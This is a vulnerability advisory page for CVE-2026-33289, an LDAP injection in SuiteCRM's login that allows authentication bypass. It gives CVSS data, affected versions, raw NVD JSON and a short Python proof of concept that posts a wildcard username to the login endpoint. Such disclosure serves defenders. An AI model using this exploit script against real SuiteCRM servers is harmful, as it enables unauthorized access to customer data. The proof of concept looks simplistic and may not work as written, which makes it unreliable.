Security Vulnerability Report
中文
CVE-2026-33289 CVSS 8.8 HIGH

CVE-2026-33289

Published: 2026-03-20 00:16:19
Last Modified: 2026-03-23 16:57:47
Source: [email protected]

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, an LDAP Injection vulnerability exists in the SuiteCRM authentication flow. The application fails to properly sanitize user-supplied input before embedding it into the LDAP search filter. By injecting LDAP control characters, an unauthenticated attacker can manipulate the query logic, which can lead to authentication bypass or information disclosure. Versions 7.15.1 and 8.9.3 patch the issue.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM < 7.15.1
SuiteCRM < 8.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_ldap_injection(target_url): """ Proof of Concept for LDAP Injection in SuiteCRM. Attempts to bypass authentication by injecting wildcard characters. """ login_endpoint = f"{target_url}/index.php" # LDAP injection payload to bypass password check # This payload attempts to make the filter evaluate to true for any user payload = { "user_name": "*)", # Injection point "user_password": "any_password" } try: response = requests.post(login_endpoint, data=payload, timeout=10) if response.status_code == 200 and "Dashboard" in response.text: print("[+] Exploit successful! Authentication bypassed.") return True else: print("[-] Exploit failed. Patch may be applied.") return False except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": target = "http://example-suitecrm.local" exploit_ldap_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33289", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:18.647", "lastModified": "2026-03-23T16:57:46.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, an LDAP Injection vulnerability exists in the SuiteCRM authentication flow. The application fails to properly sanitize user-supplied input before embedding it into the LDAP search filter. By injecting LDAP control characters, an unauthenticated attacker can manipulate the query logic, which can lead to authentication bypass or information disclosure. Versions 7.15.1 and 8.9.3 patch the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Antes de las versiones 7.15.1 y 8.9.3, existe una vulnerabilidad de inyección LDAP en el flujo de autenticación de SuiteCRM. La aplicación no logra sanear correctamente la entrada proporcionada por el usuario antes de incrustarla en el filtro de búsqueda LDAP. Al inyectar caracteres de control LDAP, un atacante no autenticado puede manipular la lógica de la consulta, lo que puede llevar a una omisión de autenticación o a una revelación de información. Las versiones 7.15.1 y 8.9.3 corrigen el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-90"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}]}]}], "references": [{"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-26vx-rj47-x599", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.